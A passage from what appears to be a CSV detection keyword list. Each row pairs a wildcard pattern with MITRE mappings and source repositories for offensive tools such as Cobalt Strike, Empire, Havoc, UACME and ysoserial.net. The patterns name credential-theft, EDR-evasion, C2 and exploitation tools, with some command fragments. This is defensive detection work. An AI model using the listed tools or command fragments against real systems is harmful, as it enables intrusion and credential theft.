tools","https://github.com/dirkjanm/PKINITtools","1","0","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*export KRB5CCNAME=/*/impacket/administrator.ccache* ","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Export-PowerViewCSV*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" +"*Export-PowerViewCSV*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*exports --dll *.dll --prototypes ./Assets/prototypes.csv*","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","9","826","104","2023-09-02T00:48:42Z","2022-10-28T09:00:35Z" +"*exposed_get_password*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*exrienz/DirtyCow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/exrienz/DirtyCow","1","1","N/A","N/A","1","27","27","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z" +"*extensions/sniffer*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*external_c2.cna*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.dll*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2.Net*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*ExternalC2.Net.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*externalc2.py*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*ExternalC2\*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*externalc2_start*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Core*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2-master*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Tests*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*ExternalC2Web*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*external-nse-script-library*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*ExternalRecon.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*extract_cmd_exec*.js*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_cmd_exec*.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*extract_reflective_loader*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ExtractBitLockerKeys*@podalirius_*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.ps1*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys.py*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractBitlockerKeys-main*","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","2","171","22","2023-10-01T21:17:31Z","2023-09-19T07:28:11Z" +"*ExtractDataXML_BruteForce*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*extracttgsrepfrompcap.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","1","71","20","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z" +"*extra-scripts*timecrack.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*eyewitness -f urls.txt --web*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*-f BinaryFormatter -g PSObject -o base64 -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f Json.Net -g ObjectDataProvider -o raw -c *","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"*-f payloads_examples/calc.*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" +"*f0432754020470baca5728aa59790267492406f847c1210fc6f1ba1b1466047b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f0b8b0d1d5b85c4324c8cbb21d94dd8db69fd21bb5e37491bbd6aa2297fa0fc7*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F1527C49-CA1F-4994-BB9D-E20DD2C607FD*","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1558 - T1558.001 - T1055 - T1055.002","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","277","50","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" +"*f1zm0/acheron*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*f1zm0/hades*","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","3","290","44","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" +"*f243a7dcea8584d55890ae0b2e01c1137b923ae6ea9bdd8ae97c14f9da79b788*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f3900a5064d5ec0c58e1da8f1a83b1cd84bab30ac4d79737cd74ada3803de0f8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F3C62326-E221-4481-AC57-EF7F76AAF27B*","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","10","10","115","29","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" +"*f4081a8e30f75d46.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*f41690990d738d243f75d60ffe7a585027c0b379735b7d9d6df9cba7c7ad4c2c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f5a45c4aa478a7ba9b44654a929bddc2f6453cd8d6f37cd893dda47220ad9870*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*F5BIG-Scanner.py*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/jiansiting/CVE-2020-5902","1","0","N/A","N/A","1","6","5","2020-07-07T02:03:40Z","2020-07-07T02:03:39Z" +"*f648515a31961e39a4395e42689b3fba1f86e0b4a724361c4ea383f50098556c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f66280e29c2116d4b83f2c6899d8caf432f7a4d1ccc4e4cf4e72b05d0fbd1f25*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*f81c975acd016c97776dd3a8e3218e148682b0336ff3fcd77fad6d9b86ddf107*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*F8E0A09D99FF46019C0C3F2B725E9887D9AE53CB7FAD0BB233BC8612C2CA51F2*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*FA0DAF13-5058-4382-AE07-65E44AFB5592*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*fa0df73ca48d6e73c1e57b6630d09ec86f04f9a1f8cfaec88d7938b2d97403ef*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fa20d8ff56109734866c6baed5d8be316d4d24a5dbf074e0e90d7e458978de1c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*Fake Computer Objects Honey Pots*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Fake Service Accounts Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*fake_ap.py*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - 